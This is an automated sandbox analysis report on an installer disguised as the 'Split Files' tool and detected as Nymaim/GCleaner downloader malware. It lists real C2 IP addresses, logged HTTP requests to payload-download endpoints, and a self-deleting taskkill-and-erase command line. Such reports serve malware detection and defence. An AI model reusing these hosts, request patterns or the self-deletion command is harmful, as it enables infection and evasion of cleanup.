Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:778239
MD5:4206f8b371294f11b01592acc7bb338d
SHA1:9383a82b185715c4b42b23ef730acb53f17dfcfb
SHA256:5f5252d8963550284ca23188a6ee8a5b9aa85c3d1ce1f5983ee7dcc7e60f8b33
Tags:exe
Infos:

Detection

Nymaim
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Nymaim
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Uses taskkill to terminate processes
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to detect sandboxes (foreground window change detection)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1968 cmdline: C:\Users\user\Desktop\file.exe MD5: 4206F8B371294F11B01592ACC7BB338D)
    • is-EPSRP.tmp (PID: 3132 cmdline: "C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp" /SL4 $502DC "C:\Users\user\Desktop\file.exe" 1694939 170496 MD5: E8176050192FBB976D70238E3C121F4C)
      • SplitFiles131.exe (PID: 4948 cmdline: "C:\Program Files (x86)\Split Files\SplitFiles131.exe" MD5: D26C02425FA67FBDC0E4B4D5D6FA6088)
        • rf6CwnLa.exe (PID: 588 cmdline: MD5: 3FB36CB0B7172E5298D2992D42984D06)
        • cmd.exe (PID: 2264 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • taskkill.exe (PID: 6076 cmdline: taskkill /im "SplitFiles131.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
  • cleanup

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["45.139.105.1", "85.31.46.167"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.376873365.0000000003270000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
    00000002.00000002.376708257.0000000003210000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
      00000002.00000002.375917003.0000000000400000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.SplitFiles131.exe.400000.1.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
          2.2.SplitFiles131.exe.3210000.3.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
            2.2.SplitFiles131.exe.400000.1.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
              2.2.SplitFiles131.exe.3210000.3.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:192.168.2.445.139.105.17149696802041920 01/05/23-09:17:07.792702
                SID:2041920
                Source Port:49696
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4107.182.129.23549697802852981 01/05/23-09:17:07.993654
                SID:2852981
                Source Port:49697
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:107.182.129.235192.168.2.480496972852925 01/05/23-09:17:08.021859
                SID:2852925
                Source Port:80
                Destination Port:49697
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4107.182.129.23549697802852980 01/05/23-09:17:07.923264
                SID:2852980
                Source Port:49697
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://171.22.30.106/library.phpURL Reputation: Label: malware
                Source: http://107.182.129.235/storage/extension.php8Avira URL Cloud: Label: malware
                Multi AV Scanner detection for domain / URL
                Source: http://107.182.129.235/storage/extension.php8Virustotal: Detection: 13%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exeReversingLabs: Detection: 50%
                Machine Learning detection for dropped file
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeJoe Sandbox ML: detected
                Source: 2.2.SplitFiles131.exe.10000000.5.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                Source: 0.0.file.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                Source: 0.2.file.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                Source: 2.2.SplitFiles131.exe.400000.1.raw.unpackMalware Configuration Extractor: Nymaim {"C2 addresses": ["45.139.105.1", "85.31.46.167"]}
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_10001000 ISCryptGetVersion,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_10001130 ArcFourCrypt,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,

                Compliance

                barindex
                Detected unpacking (overwrites its own PE header)
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeUnpacked PE file: 2.2.SplitFiles131.exe.400000.1.unpack
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0045157C FindFirstFileA,GetLastError,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0048AC5C FindFirstFileA,6D7169D0,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00423E2D FindFirstFileExW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_1000959D FindFirstFileExW,
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2041920 ET TROJAN GCleaner Downloader Activity M8 192.168.2.4:49696 -> 45.139.105.171:80
                Source: TrafficSnort IDS: 2852980 ETPRO TROJAN Win32/Fabookie.ek CnC Request M1 (GET) 192.168.2.4:49697 -> 107.182.129.235:80
                Source: TrafficSnort IDS: 2852981 ETPRO TROJAN Win32/Fabookie.ek CnC Request M3 (GET) 192.168.2.4:49697 -> 107.182.129.235:80
                Source: TrafficSnort IDS: 2852925 ETPRO TROJAN GCleaner Downloader - Payload Response 107.182.129.235:80 -> 192.168.2.4:49697
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorIPs: 45.139.105.1
                Source: Malware configuration extractorIPs: 85.31.46.167
                Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                Source: Joe Sandbox ViewIP Address: 45.139.105.171 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/extension.php
                Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/extension.php8
                Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/ping.php
                Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235ibrary.php
                Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/library.php
                Source: is-EPSRP.tmp, 00000001.00000002.377627228.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.378622763.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-MR54O.tmp.1.dr, is-IRLOP.tmp.1.drString found in binary or memory: http://rus.altarsoft.com/split_files.shtml
                Source: is-EPSRP.tmp, 00000001.00000002.377627228.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.378622763.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-2KTR4.tmp.1.dr, is-KJUD7.tmp.1.dr, is-8T8VP.tmp.1.dr, is-L90L4.tmp.1.dr, is-JPC2L.tmp.1.dr, is-4QNQO.tmp.1.dr, is-DPLT0.tmp.1.dr, is-2C8S0.tmp.1.dr, is-BOL01.tmp.1.dr, is-T2GFQ.tmp.1.drString found in binary or memory: http://www.altarsoft.com/split_files.shtml
                Source: file.exeString found in binary or memory: http://www.innosetup.com
                Source: is-EPSRP.tmp, is-EPSRP.tmp, 00000001.00000002.377659130.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.drString found in binary or memory: http://www.innosetup.com/
                Source: file.exe, 00000000.00000003.296513260.00000000023A9000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.296720525.000000000218D000.00000004.00001000.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.377767344.00000000004C4000.00000002.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.drString found in binary or memory: http://www.innosetup.comDVarFileInfo$
                Source: file.exe, 00000000.00000003.296613859.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.296406319.0000000002300000.00000004.00001000.00020000.00000000.sdmp, is-EPSRP.tmp, is-EPSRP.tmp, 00000001.00000002.377659130.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.drString found in binary or memory: http://www.remobjects.com/?ps
                Source: file.exe, 00000000.00000003.296613859.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.296406319.0000000002300000.00000004.00001000.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.377659130.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.drString found in binary or memory: http://www.remobjects.com/?psU
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,
                Source: global trafficHTTP traffic detected: GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 45.139.105.171Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: rf6CwnLa.exe, 00000003.00000002.312986657.0000000001750000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                E-Banking Fraud

                barindex
                Yara detected Nymaim
                Source: Yara matchFile source: 2.2.SplitFiles131.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.SplitFiles131.exe.3210000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.SplitFiles131.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.SplitFiles131.exe.3210000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.376873365.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.376708257.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.375917003.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408280
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00468C28
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00461280
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0043DE40
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_004302D0
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_004445B8
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00434864
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0047AA90
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00444B60
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0045ADE0
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00480F94
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00445258
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_004132E1
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00463288
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00435568
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00445664
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0042F874
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00457F04
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00404490
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_004096F0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_004056A0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00406800
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00406AA0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00404D40
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00405F40
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00402F20
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_004150D3
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00415305
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_004223A9
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00419510
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00404840
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00426850
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00410A50
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0042AB9A
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00421C88
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0042ACBA
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00447D2D
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00428D39
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00404F20
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_1000F670
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_1000EC61
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: String function: 10003C50 appears 34 times
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: String function: 0040F9E0 appears 54 times
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: String function: 004035DC appears 90 times
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: String function: 00408CA0 appears 42 times
